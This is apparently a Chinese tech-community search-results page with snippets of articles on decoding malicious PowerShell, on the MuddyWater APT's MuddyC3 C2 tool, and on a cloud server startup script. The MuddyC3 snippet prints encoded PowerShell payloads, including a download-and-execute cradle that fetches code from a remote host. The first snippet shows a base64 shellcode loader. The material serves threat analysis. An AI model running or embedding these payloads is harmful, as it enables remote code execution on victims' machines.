首页
学习
活动
专区
圈层
工具
发布

从一个恶意活动中学习 PowerShell 解码

1 第一层 – Episode 1 这个字符串可以使用 CyberChef 来解码,其中包含大量用于编码和解码的小工具: 解码后如下: $s=New-Object IO.MemoryStream(,[...IP,可识别的端口号或像 DoEvilStuff() 和 DestoryTheResistance() 之类的函数,但在结尾处有一长串字符也许能探索出东西来: [Byte[]]$var_code = [System.Convert...]::FromBase64String("/OiJAAAAYInlMdJ..ENUFF_IS_ENUFF_I_QUIT..jEwOAA=") 同样用 CyberChef 来解码,如下图所示: 解码出来的已不在是...有时候使用正常的解码看不到 IP 地址,上面的示例非常简单,但是为了演示起见,可能会在 ShellCode 之后找到类似的代码: [Byte[]]$var_code = [System.Convert]...::FromBase64String('38u[Redacted_Chracters_CMjIyMg') for ($x = 0; $x -lt $var_code.Count; $x++) { $

1.2K40
  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    “污水”(MuddyWater)APT组织C2工具MuddyC3浅析

    :---+Powershell JOB Payload+---Start-Job -scriptblock {iex([System.Text.Encoding]::ASCII.GetString([System.Convert...]::FromBase64String('JFY9bmV3LW9iamVjdCBuZXQud2ViY2xpZW50OyRWLnByb3h5PVtOZXQuV2ViUmVxdWVzdF06OkdldFN5c3RlbVdlYlByb3h5KCk7JFYuUHJveHkuQ3JlZGVudGlhbHM9W05ldC5DcmVkZW50aWFsQ2FjaGVdOjpEZWZhdWx0Q3JlZGVudGlhbHM7JFM9JFYuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xOTIuMTY4LjIuMTE0OjQ0NDQvZ2V0Jyk7SUVYKCRzKQ...Process Payload+---Start-Process powershell -ArgumentList "iex([System.Text.Encoding]::ASCII.GetString([System.Convert...WindowStyle Hidden (HIGH):---+Powershell JOB + File Payload+---iex([System.Text.Encoding]::ASCII.GetString([System.Convert...=='))) ---+Powershell JOB + File +SCT Payload+---iex([System.Text.Encoding]::ASCII.GetString([System.Convert

    1.4K20

    创建腾讯云Windows云服务器时在UserData中设计开机校验打印服务的逻辑

    JHNlcnZpY2VOYW1lID0gIlNwb29sZXIiCiRzZXJ2aWNlID0gR2V0LVNlcnZpY2UgLU5hbWUgJHNlcnZpY2VOYW1lCgppZiAoJHNlcnZpY2UuU3RhcnRUeXBlIC1uZSAiQXV0b21hdGljIikgewogICAgU2V0LVNlcnZpY2UgLU5hbWUgJHNlcnZpY2VOYW1lIC1TdGFydHVwVHlwZSBBdXRvbWF0aWMKICAgIFdyaXRlLUhvc3QgIlRoZSAnJHNlcnZpY2VOYW1lJyBzZXJ2aWNlIHN0YXJ0dXAgdHlwZSBoYXMgYmVlbiBzZXQgdG8gJ0F1dG9tYXRpYycuIgp9IGVsc2UgewogICAgV3JpdGUtSG9zdCAiVGhlICckc2VydmljZU5hbWUnIHNlcnZpY2UgaXMgYWxyZWFkeSBzZXQgdG8gc3RhcnQgYXV0b21hdGljYWxseS4iCn0KCmlmICgkc2VydmljZS5TdGF0dXMgLW5lICJSdW5uaW5nIikgewogICAgU3RhcnQtU2VydmljZSAtTmFtZSAkc2VydmljZU5hbWUKICAgIFdyaXRlLUhvc3QgIlRoZSAnJHNlcnZpY2VOYW1lJyBzZXJ2aWNlIGhhcyBiZWVuIHN0YXJ0ZWQuIgp9IGVsc2UgewogICAgV3JpdGUtSG9zdCAiVGhlICckc2VydmljZU5hbWUnIHNlcnZpY2UgaXMgYWxyZWFkeSBydW5uaW5nLiIKfQ==" $decodedContent = [System.Convert...]::FromBase64String($base64String) $scriptContent = [System.Text.Encoding]::UTF8.GetString($decodedContent

    1.2K10
    领券